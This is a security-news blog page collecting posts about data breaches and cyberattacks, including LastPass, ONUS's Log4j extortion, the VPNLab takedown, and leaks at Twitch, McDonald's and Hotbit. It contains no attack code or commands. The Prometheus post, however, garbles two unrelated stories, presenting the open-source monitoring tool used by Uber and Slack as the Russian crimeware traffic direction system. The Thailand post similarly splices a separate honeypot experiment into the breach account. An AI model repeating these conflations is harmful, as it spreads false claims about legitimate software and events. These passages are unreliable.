Search This Blog

Showing posts with label Customer Data. Show all posts

Hackers Had Internal Access for 4 Days

Password management solution LastPass has confirmed that the company was hacked and the hackers had access to its development system for four days. The company stated in a blog post that nearly two weeks back, it detected some “unusual activity” in portions of its “LastPass development environment”, and immediately carried out an investigation for the same. 

As per the company’s reports, the hackers likely gained access to some of its source code through “a single compromised developer account”. The hackers were able to compromise a company developer’s endpoint to gain access to the Development environment, impersonating the developer after he “authenticated using multi-factor authentication,” which allowed them to get hold of some of the source code and “some proprietary LastPass technical information”. However, the company claims that no user data was compromised during the action.  

The company states that all of its “products and services are operating normally.” The Investigation for the hack is still ongoing and the company states that it has “implemented additional enhanced security measures.” 

LastPass CEO Karim Toubba stated that “There is no evidence of any threat actor activity beyond the established timeline [...] there is no evidence that this incident involved any access to customer data or encrypted password vaults”. 

The company restated that despite the unauthorized access, the hacker did not succeed in getting hold of any sensitive user data owing to system design and zero trust access (ZTA) is put in place to avert such incidents in the future. 

ZTA includes complete segregation of the Development and Production environment and the company’s own inability to access any of its customer’s password vaults without the master password set by the customers. “Without the master password, it is not possible for anyone other than the owner of a vault data,” the CEO stated. 

Lastly, LastPass also mentioned that it has restored to the services of a leading cybersecurity firm to enhance its source code safety practices and will ensure its system’s security, deploying additional endpoint security guardrails in both Development and Production environments to better detect and prevent any attack aiming at its systems.

Russian Hackers Employ Malicious Traffic Direction Systems to Spread Malware



Researchers have discovered possible linkages among a subscription-based crimeware-as-a-service (Caas) solution as well as a cracked copy of Cobalt Strike according to what they presume is being offered as a tool for customers to stage post-exploitation operations. 

Prometheus is an open-source activity monitoring and warning system for cloud applications that are based on metrics. Nearly 800 cloud-native companies, namely Uber, Slack, Robinhood, as well as others, employ it. 

Prometheus offers convenient observation of a system's state along with hardware and software metrics like memory use, network utilization, and software-specific defined metrics by scraping real-time information from numerous endpoints (ex. number of failed login attempts to a web application).

Prometheus has an understood policy of omitting built-in support for security features like authentication and encryption because the numeric metrics it collects are not deemed sensitive data. This allows the company to focus on creating monitoring-related services. It's being advertised on Russian underground forums as a traffic direction system (TDS) which allows bulk phishing redirection to rogue landing pages, designed to deliver malware payloads on targeted computers for $250 per month. 

"A system of a malicious technology, malicious email circulation, illicit folders across authorized platforms, traffic diversion, and the capacity to deliver infected files are the significant elements of Prometheus," the BlackBerry Research and Intelligence Team stated in a report. 

The redirection comes from one of two places: malicious advertisements on normal websites, or websites that have been tampered with to install harmful code. The attack network begins with a spam email that contains an HTML file or a Google Docs page; when opened, it redirects the victim to a compromised website that hosts a PHP backdoor fingerprint smudges the machine to determine whether to serve the victim with malware or redirect the user to another page that may contain a phishing scam.

While TDS's aren't a novel concept, the level of sophistication, support, and cheap financial cost lend validity to the hypothesis that this is a trend that will likely emerge in the threat environment in the near future, the researchers wrote.

In addition to enabling these techniques, it is strongly advised for anyone with a Prometheus implementation to query the previously listed endpoints to see if sensitive data was exposed before the identification and TLS functionalities in Prometheus were implemented.

VPNLab.net Service was Seized Because it was Used by Criminals to Spread Ransomware

 

Following a coordinated worldwide police investigation, a VPN service used by criminals to spread ransomware, malware, and facilitate other forms of cybercrime has been knocked offline. The 15 servers used by the VPNLab.net service have been seized or disrupted as part of a combined operation by Europol, Germany's Hanover Police Department, the FBI, the UK's National Crime Agency (NCA), and others. 

According to Europol, VPNLab.net was founded in 2008 and provides services based on OpenVPN technology and 2048-bit encryption to give online anonymity for as little as $60 per year. The service also offered a double VPN, with servers located in a variety of countries. "This made VPNLab.net a popular choice for cybercriminals, who could use its services to carry on committing their crimes without fear of detection by authorities," the agency said. 

According to Europol, several investigations have revealed criminals using the VPNLab.net service to enable illegal operations such as virus dissemination. Other incidents demonstrated the service's usage in the setup of infrastructure and communications for ransomware operations, as well as the actual deployment of malware. Cybercriminals also utilized the site to spread malware while evading authorities — but now that the servers have been seized, law enforcement is reviewing customer data in an attempt to identify cybercriminals and victims of cyberattacks.

The vpnlab.net domain presently shows a warning telling visitors that the domain has been seized by legal enforcement. According to the statement, authorities obtained consumer data held on confiscated servers, and an inquiry has been initiated. Europol has not revealed which types of malware and ransomware were distributed using the VPN provider. As a consequence of the investigation, more than 100 organizations have been identified as being vulnerable to cyberattacks, and law enforcement is collaborating with them to mitigate any possible compromise. 

"The actions carried out under this investigation make clear that criminals are running out of ways to hide their tracks online," said Edvardas Šileris, head of Europol's European Cybercrime Centre (EC3). "Each investigation we undertake informs the next, and the information gained on potential victims means we may have pre-empted several serious cyberattacks and data breaches," he added. 

On January 17, 2022, authorities from Germany, the Netherlands, Canada, the Czech Republic, France, Hungary, Latvia, Ukraine, the United States, and the United Kingdom joined forces to disrupt VPNLab, with assistance from Europol.

FinTech Company Struck by Log4j Says "No" to Paying the Ransom

 

ONUS, one of the largest Vietnamese crypto trading platforms, was recently hit by a cyberattack. Hackers aimed for the company's payment system, which was running a vulnerable version of Log4j. 

Following the cyberattack, extortion began, with hackers apparently blackmailing the company into paying a $5 million ransom, or user data would be made public. According to BleepingComputer, the corporation refused to pay, and as a result, information of about nearly 2 million ONUS users showed up for sale on forums. 

Around December 9, a Proof of Concept (POC) exploit for the well-known and presently making headlines Log4j vulnerability, CVE-2021-44228, appeared on Github. Threat actors have spotted a chance to substantially exploit it since then. ONUS's Cyclos server, which used a vulnerable version of Log4Shell, was one of their targets. 

Between December 11 and December 13, the hackers were able to successfully exploit it. They also installed backdoors to increase the access's power. On December 13, a Cyclos alert apparently informed ONUS that its systems needed to be fixed; nevertheless, even if the Cyclos instance was patched, it appeared to be a late response. Threat actors had plenty of time to steal important data. According to BleepingComputer, the databases held nearly 2 million customer records, including E-KYC (Know Your Customer) information, hashed passwords, and personal information. It's worth noting that the Log4Shell flaw was discovered on a sandbox server used "for programming purposes only." 

However, hackers were able to get access to other storage sites, such as Amazon S3 buckets, where production data was stored, due to a system misconfiguration. The threat actors reportedly demanded a $5 million ransom from ONUS, which the business refused and instead decided to inform customers about the cyberattack through a closed Facebook group. 

Chien Tran, the CEO from ONUS declared that “As a company that puts safety first, we are committed to providing our customers with transparency and integrity in business operations. (…) That is why, after careful consideration, the right thing we need to do now is to inform the entire ONUS community about this incident.” 

According to an ONUS announcement on the subject, hackers were able to obtain the following consumer data from the fintech firm: 
• Name, phone number, and email address; 
• Address; 
• KYC data (procedures used by Fintech enterprises to get identification documents and customers’ proofs along with “video selfie” for an automated check); 
• Encrypted history; 
• Transaction history; 
• Other encrypted data. 

The Misconfiguration in the Amazon S3 Buckets 

Besides Log4j, which facilitated an entry for the threat actors, there was another issue too with ONUS’ Amazon S3 buckets linked to improper access control. CyStack started an investigation on the incident and published their report with details about the cyberattack and the backdoor the hackers managed to plant on the impacted system.

“During monitoring, CyStack – ONUS’s security partner, detected and reported a cyberattack on ONUS system to us. The hacker took advantage of a vulnerability in a set of libraries on the ONUS system to get into the sandbox server (for programming purposes only). However, due to a configuration problem, this server contains information that gave bad guys access to our data storage system (Amazon S3) and stole some essential data.” 

“Also on these servers, ONUS had a script to periodically back up the database to S3 which contained the database hostname and username/password as well as backup SQL files. As a consequence, the attackers could access the ONUS database to get user information. (…) To facilitate access, the attackers downloaded and ran a backdoor on the server. This backdoor was named kworker for the purpose of disguising as the Linux operating system’s kworker service. (…) The kworker backdoor obtained was written in Golang 1.17.2 and built for Linux x64. It was used as a tunnel connecting the C&C server and the compromised server via SSH protocol (a wise way to avoid detection!).” 

According to BleepingComputer, because the organisation declined to pay the requisite ransom to hackers, customer data was for sale on a data breach marketplace by December 25. Hackers claim to have 395 copies of the ONUS database tables, which contain personal information and hashed passwords. 

CyStack advised ONUS to fix Log4j, deactivate any exposed AWS credentials, and properly configure AWS access rights, as well as the recommendation that public access to crucial S3 buckets be blocked. Users should upgrade to the current Log4j version 2.17.1 as soon as possible. ONUS also stated that none of its assets was harmed and that the company's team has been working with security specialists to identify and address flaws. 

The company's asset management and storage system, ONUS Custody, was also improved. In the case of a property loss, the firm must ensure that the ONUS Protection Fund would take care of the problem.

McMenamins Struck by Ransomware Attack, Employee Data at Risk

 

McMenamins, a Portland hotel and brewpub chain, was struck by a ransomware attack on Wednesday that may have stolen employees' personal information, but no customer payment information seems to have been compromised. 

The ransomware attack was discovered and stopped on December 12, according to McMenamins. The company stated it alerted the FBI and contacted a cybersecurity firm to figure out where the attack came from and how extensive it was. 

Employee data such as names, residences, dates of birth, Social Security numbers, direct deposit bank account information, and benefits records may have been acquired, according to the firm in a news release, but "it is not currently known whether that is the case." 

"To provide employees with peace of mind, McMenamins will be offering employees identity and credit protection services, as well as a dedicated helpline through Experian," the company stated. "A payment processing service manages the collection of such information. Further, this information is not stored on company computer systems impacted by the attack."  

Many operational systems have been taken offline, including credit card scanners, necessitating temporary alterations in payment procedures at some McMenamins sites. There is "no indication" that consumer payment data has been hacked, according to the firm. 

The co-owner, Brian McMenamin stated, “What makes this breach especially disheartening is that it further adds to the strain and hardship our employees have been through in the past two years.” 

“We ask that our customers give our employees extra grace as we make temporary adjustments in the way we process transactions and reservations, given the impacts to our systems by this breach.” 

The company stated that it is unclear when the problem would be rectified and systems restored. There are a few things firms can do to assist mitigate these attacks, according to Kerry Tomlinson, a cyber news reporter with Ampere News. 

"As a business, you need to have backups," Tomlinson said. "If ransomware hits and they're demanding ransom for you to get your files back, you can say thanks a lot but I already have backups." 

"It will happen more and more and it's only going to get bigger. If you're not paying attention now, you need to pay attention." 

Employees should be especially cautious to help prevent cyber assaults, according to Tomlinson, by avoiding questionable emails, setting unique passwords for each website visited, and adding a multi-factor authentication process to offer an extra layer of security. It is worth noting that despite the breach, all McMenamins locations are open.

Panasonic Suffers Data Breach After Network Hack

 

Panasonic, a Japanese multinational giant, revealed a security breach this month after unidentified threat actors got access to computers on its network. 

The company stated in a press release issued Friday, "Panasonic Corporation has confirmed that its network was illegally accessed by a third party on November 11, 2021. As the result of an internal investigation, it was determined that some data on a file server had been accessed during the intrusion." 

Panasonic has reported the issue to the appropriate authorities and has taken steps to restrict external servers from accessing its network. The Japanese electronics behemoth has also recruited a third party to examine the attack, which Panasonic described as a "leak" in a press release, and determine whether any of the data acquired during the hack included customer personal information. 

"In addition to conducting its own investigation, Panasonic is currently working with a specialist third-party organization to investigate the leak and determine if the breach involved customers' personal information and/or sensitive information related to social infrastructure," the company added. 

When approached by BleepingComputer, a Panasonic official was not immediately available for comment. 

"Panasonic would like to express its sincerest apologies for any concern or inconvenience resulting from this incident", said the organization. 

In June, Panasonic servers were reportedly hacked

While the press statement does not include many specifics about the attack timeframe, Japanese media sites such as Mainichi and NHK stated that the attackers gained access to Panasonic's systems between June and November, as originally reported by The Record. 

Furthermore, they acquired access to critical customer and customer and employee data until Panasonic discovered the illicit activity on November 11. The attack on Panasonic's server is the latest in a lengthy line of instances affecting Japanese corporations in recent years. 

Security incidents and, in some circumstances, data breaches have also been reported by Kawasaki, NEC, Mitsubishi Electric, and defence contractors Kobe Steel and Pasco.

Amazon's Twitch Blames Server Error for Massive Data Leak

 

Twitch disclosed a massive data breach on Wednesday, attributing it to an "error in a Twitch server configuration change" that exposed certain data to the internet. 

The purportedly stolen material includes the source code for Amazon's streaming platform, reports on creator payments, and information regarding an unannounced Steam competitor from Amazon Game Studios. Twitch acknowledged the incident in a tweet on Wednesday. The firm will provide further information in a blog post later, stating that it is still trying to determine the entire scope of the event. 

The company wrote, "We have learned that some data was exposed to the internet due to an error in a Twitch server configuration change that was subsequently accessed by a malicious third party." 

"Our teams are working with urgency to investigate the incident." 

Twitch said there's no indication that login credentials were exposed. The streaming platform also said, "full credit card numbers are not stored by Twitch, so full credit card numbers were not exposed." 

Twitch's brief statement demonstrates that the company is in full crisis mode. IT professionals and security specialists are still attempting to determine the severity of the data breach. The attack was caused by a "server configuration" issue, according to the explanation. In other words, someone misconfigured the computers that contain Twitch's sensitive data, allowing hackers to discover and download it. 

The organization has not yet stated when this error occurred. Some of the stolen data dates back three years, so the computers might have been a victim for a while - or the error could have just left the door open for a few days or weeks. Attackers are always searching and analyzing the internet for open databases, and someone may likely have informed hackers about the internal IT mistake. 

Making these types of blunders, however, is costly, especially when the target is as large as Twitch. Numerous streamers informed BBC News that the payment data was correct for their own earnings and this poses issues for the firm. Candid Wuest from cyber-security company Acronis stated, "A lot more damage is now in store for Twitch. The breach is already harming Twitch on all the fronts that count." 

The leaked data "could contain nearly the full digital footprint of Twitch, making it one of the most severe data breaches of late." "Releasing payout reports for streaming clients will not make the influencers happy either," Mr. Wuest added. 

The download released online is also labeled "part one," implying that there may be more data to be published on the internet.

Elastic Stack API Security Vulnerability Exposes Customer and System Data

 

The mis-implementation of Elastic Stack, a collection of open-source products that employ APIs for crucial data aggregation, search, and analytics capabilities, has resulted in severe vulnerabilities, according to a new analysis. Researchers from Salt Security uncovered flaws that allowed them to not only conduct attacks in which any user could extract critical customer and system data, but also to create a denial of service condition in which the system would become inaccessible. 

“Our latest API security research underscores how prevalent and potentially dangerous API vulnerabilities are. Elastic Stack is widely used and secure, but Salt Labs observed the same architectural design mistakes in almost every environment that uses it,” said Roey Eliyahu, co-founder and CEO, Salt Security. “The Elastic Stack API vulnerability can lead to the exposure of sensitive data that can be used to perpetuate serious fraud and abuse, creating substantial business risk.” 

The vulnerability was originally detected while safeguarding one of their customers, a huge online business-to-consumer platform that provides API-based mobile applications and software as a service to millions of consumers around the world, according to the researchers. 

 Officials at Salt Security were eager to point out that this isn't a flaw in Elastic Stack itself, but rather a problem with how it's being deployed. According to Salt Security's technical evangelist Michael Isbitski, the vulnerability isn't due to a fault in Elastic's software, but rather to "a common risky implementation set up by users." 

"The lack of awareness around potential misconfigurations, mis-implementations, and cluster exposures is largely a community issue that can be solved only through research and education," Isbitski said. API threats have increased 348% in the last six months, according to the Salt Security State of API Security Report, Q3 2021. The development of business-critical APIs, combined with the advent of exploitable vulnerabilities, reveals the substantial security flaws that occur from the integration of third-party apps and services.

The impact of the Elastic Stack design implementation flaws rises considerably when an attacker chains together multiple attacks, according to Salt Labs researchers. Attackers can use the lack of authorization between front-end and back-end services to establish a working user account with basic permission levels, then make educated assumptions about the schema of back-end data stores and inquire for data they aren't authorized to access. 

Salt Labs was able to gain access to a large amount of sensitive data, including account numbers and transaction confirmation numbers, as part of its research. Some of the sensitive information was also private and subject to GDPR regulations. Attackers could use this information to access other API-based features, such as the ability to book new services or cancel existing ones.

Thailand's Data on 106 Million Visitors has been Breached

 

After uncovering an unsecured database collecting the personal information of millions of tourists to Thailand, a British cybersecurity researcher unexpectedly stumbled upon his own personal data online. An unencrypted Elasticsearch server was discovered by Bob Diachenko, a cybersecurity researcher and security leader at Camparitech, exposing the personal data of approximately 106 million international passengers to Thailand. The data was accessible online in an unsecured database, allowing anyone to access it. 

Threat actors are constantly on the lookout for unprotected servers. There is no proof of how long the database was exposed before Diachenko's disclosure in this case. A honeypot, on the other hand, was set up to monitor hacker intrusions.

 “Notably, the IP address of the database is still public, but the database itself has been replaced with a honeypot. Anyone who attempts access at that address now receives the message: This is honeypot, all access were logged,” Diachenko added. 

A honeypot is a security tool that detects or prevents unauthorized network and information system breaches. The organization set up a honeypot to see how quickly hackers would attack an Elasticsearch server using a dummy database and fake data. From May 11 until May 22, 2020, Comparitech left the data exposed. It discovered 175 attacks in just eight hours after the service went live, with a total of 22 attacks in a single day. 

After he reported the problem to Thai authorities, the database was safeguarded. According to Diachenko, every visitor who visited Thailand in the last ten years may have had their personal information exposed as a result of the event. Over 200GB of user data was stored in the database. Date of arrival in Thailand, full name, sex, passport number, residency status, visa type, and Thai arrival card number were among the data disclosed. 

“Any foreigner who traveled to Thailand in the last decade or so probably has a record in the database. There are many people who would prefer their travel history and residency status not be publicized, so for them there are obvious privacy issues. None of the information exposed poses a direct financial threat to the majority of data subjects,” Diachenko stated. 

“No financial or contact information was included. Although passport numbers are unique to individuals, they are assigned sequentially and are not particularly sensitive,” Diachenko added.

McDonald’s Password for the Monopoly VIP Database Leaked

 

The fast-food chain McDonald's mistakenly sent out emails with login credentials associated with a database for its Monopoly VIP game. 

McDonald's UK had to postpone the famous Monopoly VIP game for a year due to the COVID -19 pandemic. This year, on August 25th, McDonald's reintroduced the game. 

McDonald's Monopoly is a well-known marketing gimmick in which customers can win gifts and money by entering codes found on purchases. Basically, every time a person purchases a meal from a McDonald's restaurant, they have a chance to win a gift. 

Unfortunately, the game encountered a roadblock over the weekend when a bug resulted in prize redemption emails sent to prize winners, including the user names and passwords for the production and staging database servers. 

Troy Hunt released an unredacted screenshot of an exception fault in an email issued to prize winners with BleepingComputer, which includes critical information for the online application. 

The redacted email sent to a Monopoly VIP winner contained hostnames for Azure SQL databases and the databases' login names and passwords. The prize winner who shared the email with Troy Hunt stated that the production server was firewalled off but that the staging server could be accessed using the attached credentials. 

The person informed Troy Hunt in an email published with BleepingComputer, "I tried to connect to production to gauge the severity of the issue and whether or not getting in touch was an urgent matter but luckily for them they had a set of firewall rules setup. I did however gain access to staging, which I disconnected from immediately for obvious reasons." 

Since these files may have contained winning prize codes, an unethical individual might have obtained unused game codes and exploited them to claim the rewards. 

Luckily for McDonald's, the individual appropriately reported the problem to them. While they did not receive a reply but later discovered that the staging server's password had been changed. 

Though this was not a unique incident, as several people claimed to have seen the credentials and even went so far as to record their experience on TikTok. 

McDonald's notified BleepingComputer that just the staging server's credentials were compromised, while the error clearly stated that the credentials of both a production and staging server were leaked.

In a statement, McDonald's told BleepingComputer, "Due to an administrative error, a small number of customers received details for a staging website by email. No personal details were compromised or shared with other parties." 

"Those affected will be contacted to reassure them that this was a human error and that their information remains safe. We take data privacy very seriously and apologize for any undue concern this error has caused.”

Hackers Target American Retail Businesses, FINRA Scolds Brokerage Firms

 

Besides the American corporations facing threats from overwhelming cyberattacks, American retail businesses are also struggling to fight against the rise of hackers hacking into their accounts and investments. FINRA (Financial Industry Regulatory Authority), the market's self-regulatory body, in a recent notice said that it received several complaints related to customer accounts being hacked. The incident involved attackers using stolen customer information like login credentials to hack into online customers' brokerage accounts. 

According to Market Watch "Ari Jacoby, chief executive and co-founder of cybersecurity firm Deduce, backed up this statement with data showing that account-takeover fraud increased by roughly 250% from 2019 to 2020. He told Security.org that account-takeover prevention is a $15 billion market that is “growing significantly year-over-year.“ FINRA finds two factors that might be responsible for the surge in account takeover incidents. 

First is an increase in the use of online services and brokerage apps, that allows hackers to break into user accounts using login I'd and passwords that they buy from Darkweb. It becomes very easy for hackers to find the login credentials of the customers as many users use the same password combinations for multiple accounts. The second aspect is the Covid-19 factor. "Customer account-takeovers have been a recurring issue, but reports to FINRA about such attacks have increased as more firms offer online accounts, and as more investors conduct transactions in these accounts. In part due to the proliferation of mobile devices and applications and the reduced accessibility of firm’s physical locations due to the COVID-19 pandemic," reports FINRA. 

The Security and Exchange Commission is also keeping an eye on this incident and is pressing hard on brokerage firms for not keeping a check on suspicious activities. Market Watch says "But most individual investors don’t have to wait for the SEC or FINRA to come to their rescue, because this sort of criminal activity is largely enabled by a lack of vigilance on the part of victims, including requesting that their broker send them suspicious login alerts and using two-factor authentication, according to Jacoby."

Furniture Village Hit by a Week-Long Cyber Attack

 

Customers have been left 'with nothing to sit on' and unable to pay while waiting for sofas, beds, and tables as a result of a week-long cyber-attack on Furniture Village. The Slough-based store revealed yesterday that it had been the 'subject of a cybersecurity attack,' but that 'to the best of its knowledge,' no customer data had been disclosed. 

Internal systems are momentarily down, according to the company's website, although orders are still being taken online and in stores. The problem was discovered six days ago, on May 29, when Furniture Village said that its systems were experiencing technical difficulties and that its phone lines had been disconnected. 

Customers have been complaining on social media for over a week about not being able to get refunds or contact customer service, as well as delays or cancellations in delivery. The company confessed in a tweet that deliveries are taking longer than normal since its 'warehouses are currently operating manually.' 

In a statement released yesterday, Furniture Village said: "Frustratingly, our company was recently the target of a cybersecurity attack, however, by immediately implementing security protocols, including shutting down the affected systems, we were able to restrict the scope of the attack. Thankfully, to the best of our knowledge, no personal data has been lost or compromised." 

"We're working around the clock to restore all system-related functions of the business as soon as it’s safe to do so. The business remains healthy, and our teams are focused on supporting our customers, resorting to manual processes where necessary," the company added. 

The precise nature of the attack is unknown at this time, however, some industry experts suspect the retailer was the victim of a ransomware campaign. No formal confirmation has been given as to whether or not law enforcement agencies have been alerted. 

The National Crime Agency of the United Kingdom released its 2021 National Strategic Assessment last week, claiming that criminals are using technological advancements to fuel "serious and organised crime." Ransomware assaults have "grown in frequency and impact," according to the report.

"It is estimated 50 percent of all ransomware attacks included a threat to publish stolen data and over the last year there were £3bn of estimated fraud losses for UK individuals and businesses, but an accurate figure is constrained by significant under-reporting," it said.

Researchers Flag Serious Authentication Bypass Vulnerability After Pega Infinity Hotfix Released

 

After security researchers discovered a flaw in the Pega Infinity enterprise software platform, users are being advised to upgrade their installations. 

CVE-2021-27651 is a critical-risk vulnerability in Pega's Infinity program versions 8.2.1 to 8.5.2, according to the research team of Sam Curry, Justin Rhinehart, Brett Buerhaus, and Maik Robert. 

The proof-of-concept shows how an intruder can circumvent Pega Infinity's password reset system. Via administrator-only remote code execution, assailants could then use the reset account to “fully compromise” the Pega case. It includes modifying complex pages or templating. The researchers collaborated with the developer Pegasystems, to construct a hot patch. According to the vendor, customers running the program on-premises should check if their version is affected and apply the relevant hot patch. 

With over 2,000 users, Pega Infinity is a common enterprise software suite. Customer service and sales automation, an AI-driven ‘customer decision hub,' workforce intelligence, and a ‘no-code' development platform are all included in the kit. The Pega Infinity vulnerability was discovered as a result of the security researchers' involvement in Apple's bug bounty program. 

“We’d been hacking on Apple's bug bounty program for about six months and had spent a lot of time on software produced by Apple themselves,” UK-based hacker Sam Curry told The Daily Swig. 

“After reading a blog post from two amazing researchers, we agreed to take a different approach and target vendors [supplying technology to Apple].”Curry has written about his experiences with Apple's bug bounty program in the past. 

Burp Suite was used by the researchers to find the password reset flaw in Pega Infinity. According to Curry, this allows for a complete compromise of any Pega instance with "no prerequisite information." Justin Rhinehart also developed a Nuclei template for determining whether or not the software is running Pega Infinity. 

“Pega's customers are from every sector and at the time of reporting some of the customers included the FBI, US Air Force, Apple, American Express, and a few other huge names.” 

Curry states that Pega was able to collaborate with the researchers to patch the flaw, although they needed time for customers using Infinity on-premises to upgrade their installations. Curry mentioned that the procedure took more than three months.

Amazon Fake Reviews Scam Exposed in Data Breach

The identities of over 200,000 people who appear to be participating in Amazon fraudulent product review schemes have been exposed by an open database. 

There is an ongoing struggle between the e-commerce giant and shady traders all over the world who want to hamstring rivals and gain an advantage by creating fake product feedback. The ways in which they function and remain under Amazon's radar differ, but an open ElasticSearch server has revealed some of their inner workings. 

Researchers from Safety Detectives reported on Thursday that the server, which was open to the public and accessible online, held 7GB of data and over 13 million documents appeared to be connected to a widespread fake review scam. It is unknown who owns the server, but due to messages written in Chinese that were leaked during the incident, there are indications that the company might be based in China. 

The database includes the user names, email addresses, PayPal addresses, links to Amazon accounts, and both WhatsApp and Telegram numbers, which also included records of direct messages between consumers willing to provide false reviews and traders willing to pay them. The leak may implicate "more than 200,000 people in unethical activities," according to the team. 

The database, as well as the messages it included, exposed the strategies used by suspicious sellers. One approach involves sending a customer a connection to the goods or products for which they want 5-star ratings, and the customer then makes a purchase. After a few days, the customer leaves a positive review and sends a message to the vendor, which will result in payment via PayPal — which could be a 'refund,' while the item is kept for free. It's more difficult to spot fraudulent, paid reviews because refund payments are held off the Amazon website. 

On March 1, an open ElasticSearch server was discovered, but the owner could not be identified. On March 6, however, the leak was detected and the server was secured. 

"The server could be owned by a third-party that reaches out to potential reviewers on behalf of the vendors [or] the server could also be owned by a large company with several subsidiaries, which would explain the presence of multiple vendors," the researchers speculated. "What's clear is that whoever owns the server could be subject to punishments from consumer protection laws, and whoever is paying for these fake reviews may face sanctions for breaking Amazon's terms of service." 

Vendors are not allowed to review their own goods or receive a "cash incentive, discount, free products, or other compensation" in exchange for positive reviews, according to Amazon's spokesperson and review policy which includes third-party organizations. However, since Amazon is such a popular online marketplace, it's likely that some vendors will continue to try to take advantage of review systems in order to increase their profits. 

"We want Amazon customers to shop with confidence, trusting that the reviews they read are genuine and appropriate," a spokesperson for the company said. "We have clear policies for both reviewers and selling partners that forbid the misuse of our community features, and we suspend, ban, and taint people who break them," states the company.

Hackers Target Rogers With a New SMS Phishing Campaign

 

Rogers Communications Inc. is advising Canadians to be wary of SMS phishing scams that promise to refund consumers for a system outage that occurred earlier last week. Users were unable to use cellular voice and data networks after the network experienced a nationwide blackout a week ago. Threat actors are also sending fraudulent text messages to recipients, instructing them to click on a link to receive a rebate. 

An SMS circulated on social media falsely reports that “R0GERS WIRELESS INC.” (spelled with a zero instead of an O) is providing a $50 credit to anyone who clicks on a link provided.

Rogers Communications Inc. is a communications and publishing corporation based in Canada. With substantial additional telecommunications and mass media infrastructure, it mainly functions in the areas of cellular broadcasting, cable television, telephony, and Internet connectivity. Rogers' offices are located in Toronto and Ontario. While the business dates back to 1925, when Edward S. Rogers Sr. formed Rogers Vacuum Tube Company to market battery less radios, the current venture dates back to 1960, when Ted Rogers and a partner purchased the CHFI-FM radio station, and then became part-owners of a consortium that created the CFTO television station.

Rogers replied that it never sends credit alerts via text message and advises anyone who receives one to ignore the embedded link. Furthermore, the credit amount will vary based on the cellular plan and will not include a registration link, according to the company. 

According to Ericsson, the 16-hour wireless system blackout on April 19th was triggered by a software update that caused devices to be disconnected from the network. A message from Rogers CTO Jorge Fernandes to customers the next day said, "We have addressed the software issue and our engineering and technical teams will continue to work around the clock with the Ericsson team to restore full services for our customers." 

The links in these texts all point to websites that are hosted on an IP address rather than a domain name. It's unclear what information was phished because the pages have all been taken offline, but it's definitely Rogers customers' personal and account information. 

Rogers is aware of the scam and has advised users to "forward the content of the SMS to 7726 (SPAM), to register it for investigation/blocking from the network," according to a tweet from the company.

Hotbit Shut Down all Services After a Cyberattack

 

After an alleged cyberattack on Thursday, cryptocurrency trading site Hotbit has shut down all of its services. A note on the platform's website reads, “Hotbit just suffered a serious cyber-attack starting around 08:00 PM UTC, April 29, 2021, which led to the paralysation of a number of some basic services.”   

While the hackers were unable to obtain access to Hotbit's wallets, they were able to penetrate the platform's user database. Customers should ignore all contact from people pretending to be members of the exchange, according to the Hotbit team. Hotbit has reported that pending trading orders are cancelled to avoid damages when all regular activities are suspended during the ongoing maintenance. During the upkeep, the exchange also agreed to cover all damages incurred by exchange-traded funds listed on its website.

Before restoring servers and facilities, the exchange is looking for any evidence of computer tampering that may have contaminated any of the frequently backed up data. Due to the time required to review backup data before beginning the system restoration process, customers were advised that the investigation and recovery process could take anything from 7 to 14 days. 

The attackers have obtained access to plain text customer information (phone number, email address, and asset data) contained in Hotbit's servers, according to the company. Despite the fact that customers' passwords and 2FA keys were secured, the exchange advised consumers to update their passwords on all other web sites where they used the same credentials. 

Alex Zhou, Hotbit's chief security officer, told users on the exchange's Telegram group that customer funds were unaffected by the attack, saying: “The attacker tried to break into the wallet server to steal funds but the action was identified and blocked successfully by Hotbit risk control system. All users’ funds are safe. At the same time, Hotbit is in the process of transferring all funds in hot wallet to cold wallet, the details of the whole integration could be seen on the chain,” he said. 

Multiple token outflows from one of Hotbit's established wallets to another address that currently holds around $14 million in many altcoins, according to data from Ethereum transaction tracking platform Etherscan.

According to comments on social media and in the platform's Telegram forum, the length of time provided for the maintenance is causing considerable unrest among Hotbit users.

Furniture Retailer Vhive's Data Breach: Customer Information Leaked Online, Under Investigation

 

The officials are investigating a data breach at local furniture retailer Vhive, which resulted in customer’s personal information such as phone numbers and physical addresses being leaked online. In response to questions from The Straits Times on Saturday, April 3, police confirmed that a report had been filed on the matter.

According to the company, information compromised in the hack includes customers' names, physical and e-mail addresses, and mobile numbers, but it did not include identification numbers or financial information.

In a Facebook post on March 29, Vhive announced that its server was hacked on March 23 and that it was working with police and other relevant agencies, as well as IT forensic investigators, to investigate the breach. 

"All financial records in relation to purchases made with Vhive are held on a separate system which was not hacked," said Vhive. 

"We are truly sorry for the incident and stand ready to assist you if you require immediate help," Vhive told customers. 

According to ST's checks on Saturday afternoon, Vhive's e-mail servers were also compromised. The website only displayed a warning of the cyber attack, while the company's stores on the online shopping platforms Lazada and Shopee were open for business. 

The Altdos hacking group, which operates mainly in Southeast Asia, has claimed responsibility for the breach. In an email to affected customers on Saturday, Altdos said it had hacked into Vhive three times in nine days and claimed to have stolen information of over 300,000 customers as well as nearly 600,000 transaction records. 

The group announced that it will publish 20,000 customer records daily until its demands to Vhive’s management are met. In its Facebook statement, Vhive said it would be closely guided by the forensic investigator and authorities on the steps to protect its systems and ensure that customers can conduct transactions securely. 

In previous hacking incidents, Altdos has stolen customer data from companies, blackmailed the compromised company, leaked the data online if its requirements were not met, and publicized the violations. The cyberattacks were mainly focused on stock exchanges and financial institutions. 

In January, Altdos claimed to have broken into the IT infrastructure of the Bangladeshi conglomerate Beximco Group and stole data from 34 of its databases. 

Last December, it hacked a Thai securities trading firm and posted stolen data online when the firm allegedly failed to confirm her emails and claims.

Nefilim Ransomware Evolving Rapidly: Top Targets at a Glance


Ransomware has continually expanded both in terms of threat and reach as threat actors continue to devise fresh methods of introducing new ransomware variants and malware families. One such newly emerged ransomware that was first identified at the end of February 2020, Nefilim, threatens to release victims’ encrypted data if they are unable to pay the ransom. With a striking code resemblance to that of Nemty 2.5 revenge ransomware, Nefilim is most likely to be distributed via exposed Remote Desktop Protocol, according to Vitali Kremez, an ethical hacker at SentinelLabs.

Earlier this month, researchers from threat intelligence firm Cyble, discovered a post by the authors of Nefilim ransomware, claiming to have hacked The SPIE Group, an independent European market leader for technical services in the fields of energy. As per the claims made by the operators in the post, they are in the possession of around 11.5 GB of company’s sensitive data that include corporate operational documents- company’s telecom services contracts, dissolution legal documents, infrastructure group reconstruction contacts and a lot more.

